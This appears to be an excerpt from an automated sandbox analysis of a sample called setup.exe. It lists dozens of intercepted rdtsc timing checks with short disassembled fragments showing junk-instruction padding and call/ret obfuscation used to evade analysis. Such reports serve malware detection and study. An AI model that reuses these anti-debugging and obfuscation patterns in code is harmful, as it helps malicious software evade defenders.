Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 471757 second address: 47178C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr [esp+04h] 0x0000000b jnp 00007F47CD346620h 0x00000011 mov eax, dword ptr [eax] 0x00000013 push eax 0x00000014 push edx 0x00000015 jg 00007F47CD346626h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47178C second address: 4717C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361212h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp+04h], eax 0x0000000d pushad 0x0000000e pushad 0x0000000f jmp 00007F47CD36120Eh 0x00000014 jmp 00007F47CD36120Dh 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4717C8 second address: 471829 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD346623h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a pop eax 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007F47CD346618h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 0000001Dh 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 lea ebx, dword ptr [ebp+1245C292h] 0x0000002b mov edx, dword ptr [ebp+122D2D65h] 0x00000031 push eax 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F47CD346622h 0x0000003b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 471829 second address: 471833 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47CD361206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 471833 second address: 47183D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jng 00007F47CD346616h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 471891 second address: 47189C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F47CD361206h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 47189C second address: 4718A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 48358F second address: 4835A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F47CD361210h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4835A8 second address: 4835B3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jo 00007F47CD346616h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4907EC second address: 4907FC instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnl 00007F47CD361206h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4907FC second address: 490814 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD34661Ch 0x00000007 push edx 0x00000008 pop edx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 490814 second address: 490818 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 490818 second address: 490824 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 490824 second address: 490828 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 490828 second address: 49084E instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d jmp 00007F47CD346629h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49084E second address: 49085A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007F47CD361206h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4909F2 second address: 490A03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD34661Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 490A03 second address: 490A26 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F47CD36120Ah 0x0000000d jmp 00007F47CD361211h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 490A26 second address: 490A2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 490B91 second address: 490BB1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jne 00007F47CD36120Ah 0x0000000c jno 00007F47CD36120Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 490BB1 second address: 490BB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 490BB5 second address: 490BB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 490FC3 second address: 490FE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F47CD346626h 0x00000009 jng 00007F47CD346616h 0x0000000f popad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 491438 second address: 49144B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD36120Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 491A32 second address: 491A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jmp 00007F47CD346621h 0x00000008 jmp 00007F47CD346628h 0x0000000d pop eax 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pushad 0x00000011 jmp 00007F47CD346623h 0x00000016 push ebx 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49200F second address: 492013 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 492013 second address: 492021 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F47CD346616h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 492021 second address: 492025 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 492170 second address: 49217A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F47CD346616h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49217A second address: 492192 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361214h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 492192 second address: 49219B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49269F second address: 4926A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4926A3 second address: 4926AF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F47CD346616h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4926AF second address: 4926B4 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4968C7 second address: 4968CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 497123 second address: 497127 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 497127 second address: 49712D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 498192 second address: 49819C instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 46313A second address: 463144 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F47CD346616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 469D0F second address: 469D15 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 469D15 second address: 469D25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007F47CD346616h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49CC58 second address: 49CC5F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49CC5F second address: 49CC65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49D27A second address: 49D288 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a pop ecx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 49D417 second address: 49D41B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A0CFF second address: 4A0D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007F47CD361206h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A0EB1 second address: 4A0EB7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A0EB7 second address: 4A0EBD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A0EBD second address: 4A0EC1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A13FA second address: 4A1400 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A1400 second address: 4A140A instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F47CD34661Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A1A9D second address: 4A1AEB instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47CD361208h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push ebx 0x0000000c pushad 0x0000000d jc 00007F47CD361206h 0x00000013 js 00007F47CD361206h 0x00000019 popad 0x0000001a pop ebx 0x0000001b nop 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007F47CD361208h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 0000001Ch 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 and si, 5FF7h 0x0000003b xchg eax, ebx 0x0000003c push eax 0x0000003d pushad 0x0000003e pushad 0x0000003f popad 0x00000040 push eax 0x00000041 push edx 0x00000042 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A1AEB second address: 4A1AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A1AF8 second address: 4A1AFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A1AFC second address: 4A1B06 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F47CD346616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A1B06 second address: 4A1B0C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A28DE second address: 4A293C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop ecx 0x00000008 nop 0x00000009 mov dword ptr [ebp+122D18C1h], ebx 0x0000000f push 00000000h 0x00000011 push 00000000h 0x00000013 push edi 0x00000014 call 00007F47CD346618h 0x00000019 pop edi 0x0000001a mov dword ptr [esp+04h], edi 0x0000001e add dword ptr [esp+04h], 00000014h 0x00000026 inc edi 0x00000027 push edi 0x00000028 ret 0x00000029 pop edi 0x0000002a ret 0x0000002b movsx edi, dx 0x0000002e push 00000000h 0x00000030 jmp 00007F47CD34661Eh 0x00000035 xchg eax, ebx 0x00000036 pushad 0x00000037 push edx 0x00000038 pushad 0x00000039 popad 0x0000003a pop edx 0x0000003b jmp 00007F47CD346621h 0x00000040 popad 0x00000041 push eax 0x00000042 push ecx 0x00000043 push eax 0x00000044 push edx 0x00000045 pushad 0x00000046 popad 0x00000047 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A3A70 second address: 4A3A7A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F47CD361206h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A311A second address: 4A312B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47CD34661Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A43D7 second address: 4A43DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A4F3C second address: 4A4F40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A51F1 second address: 4A51F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A73D7 second address: 4A73DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A714A second address: 4A7158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pushad 0x00000006 je 00007F47CD36120Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A7C05 second address: 4A7C2B instructions: 0x00000000 rdtsc 0x00000002 jng 00007F47CD346618h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F47CD346625h 0x00000013 push ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A8DFA second address: 4A8DFF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC985 second address: 4AC9A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F47CD346623h 0x0000000a jnp 00007F47CD34661Ch 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A9C7E second address: 4A9CDA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F47CD361210h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F47CD36120Fh 0x0000000f nop 0x00000010 sub dword ptr [ebp+122D18C1h], edx 0x00000016 push dword ptr fs:[00000000h] 0x0000001d mov edi, dword ptr [ebp+122D35DAh] 0x00000023 mov dword ptr fs:[00000000h], esp 0x0000002a push edi 0x0000002b cmc 0x0000002c pop edi 0x0000002d mov eax, dword ptr [ebp+122D08FDh] 0x00000033 mov edi, dword ptr [ebp+122D2F2Dh] 0x00000039 push FFFFFFFFh 0x0000003b mov edi, dword ptr [ebp+1247F428h] 0x00000041 push eax 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AAAE3 second address: 4AAAEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A8DFF second address: 4A8E05 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC9A4 second address: 4AC9AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A9CDA second address: 4A9CDE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AAAEB second address: 4AAB06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 popad 0x00000008 push eax 0x00000009 push ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F47CD34661Fh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4A8E05 second address: 4A8E14 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c push edi 0x0000000d pop edi 0x0000000e pop ecx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AC9AE second address: 4AC9B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD00E second address: 4AD012 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD012 second address: 4AD02C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 popad 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F47CD34661Ch 0x00000013 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4ADFA3 second address: 4ADFAD instructions: 0x00000000 rdtsc 0x00000002 jns 00007F47CD36120Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD286 second address: 4AD29A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47CD346620h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 4AD29A second address: 4AD29E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4AF177 second address: 4AF17D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4AF17D second address: 4AF1F6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F47CD361206h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f mov edi, dword ptr [ebp+12460A19h] 0x00000015 push dword ptr fs:[00000000h] 0x0000001c mov edi, dword ptr [ebp+122D2FD2h] 0x00000022 pushad 0x00000023 jng 00007F47CD361206h 0x00000029 mov dword ptr [ebp+1248516Ah], eax 0x0000002f popad 0x00000030 mov dword ptr fs:[00000000h], esp 0x00000037 call 00007F47CD361213h 0x0000003c mov ebx, esi 0x0000003e pop edi 0x0000003f add ebx, dword ptr [ebp+122D3491h] 0x00000045 mov eax, dword ptr [ebp+122D0811h] 0x0000004b add edi, dword ptr [ebp+12485242h] 0x00000051 mov bl, 18h 0x00000053 push FFFFFFFFh 0x00000055 mov bl, ah 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jmp 00007F47CD361211h 0x0000005f rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4AF1F6 second address: 4AF200 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F47CD34661Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4B0080 second address: 4B0097 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F47CD361212h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4B1E7D second address: 4B1EA7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F47CD346629h 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e je 00007F47CD34661Ch 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4B1EA7 second address: 4B1EAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4B2F00 second address: 4B2F48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007F47CD346616h 0x0000000a popad 0x0000000b nop 0x0000000c xor dword ptr [ebp+1245CB3Ch], edi 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F47CD346618h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e push 00000000h 0x00000030 or edi, dword ptr [ebp+1245790Ch] 0x00000036 cld 0x00000037 xchg eax, esi 0x00000038 push esi 0x00000039 jbe 00007F47CD34661Ch 0x0000003f push eax 0x00000040 push edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4B2F48 second address: 4B2F58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 js 00007F47CD361210h 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4B219B second address: 4B21B6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F47CD346627h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4B6655 second address: 4B665B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\setup.exe RDTSC instruction interceptor: First address: 4B845F second address: 4B8469 instructions: 0x00000000 rdtsc 0x00000002 jp 00007F47CD346616h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
